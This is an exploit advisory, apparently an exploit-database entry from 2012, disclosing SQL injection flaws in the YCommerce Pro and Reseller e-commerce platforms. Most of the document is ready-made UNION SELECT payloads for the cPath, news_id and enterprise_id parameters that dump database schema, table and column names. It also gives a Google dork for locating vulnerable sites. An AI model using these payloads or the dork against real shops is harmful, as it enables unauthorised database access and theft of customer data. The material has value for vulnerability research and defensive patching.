# Exploit Title: YCommerce Pro/Reseller SQL Injection Vulnerability # Google Dork: intext:desenvolvido por partteam.com - Plataforma YCommerce # Date: 2012-09-21 # Exploit Author: Ricardo Almeida ricardojba@aeiou.pt # Vendor Homepage: http://www.partteam.com # Software Link: N/A # Version: YCommerce Pro and YCommerce Reseller # Tested on: N/A # CVE: N/A -- Affected Vendors: --------------------- Partteam [M.S.N.F Soluções Informáticas, Lda.] -- Affected Products: --------------------- YCommerce [Reseller and Pro versions] -- Disclosure Timeline: ----------------------- 2012-08-20 - Vendor Notification. 2012-08-30 - New Vendor Notification. 2012-09-20 - No Vendor Response / Feedback till date. 2012-09-21 - Public Disclosure. Proof of Concept - YCommerce Reseller ------------------------------------- GET Param "cPath" - [Number of columns may vary] /store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- /store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- /store/index.php?cPath=1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- GET Param "news_id" - [Number of columns may vary] /store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- Proof of Concept - YCommerce Pro -------------------------------- GET Param "enterprise_id" - [Number of columns may vary] /store/default.php?enterprise_id=-1 union all select 1,2,concat_ws(0x3a,table_schema,table_name,column_name),4,5,6,7 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61 GET Param "news_id" - [Number of columns may vary] /store/index.php?pag=news&news_id=-1 union all select 1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7,8 from information_schema.columns where table_schema!=0x696E666F726D6174696F6E5F736368656D61-- -- Disclaimer: -------------- The information provided in this advisory is provided as it is without any warranty. I am not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. I do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.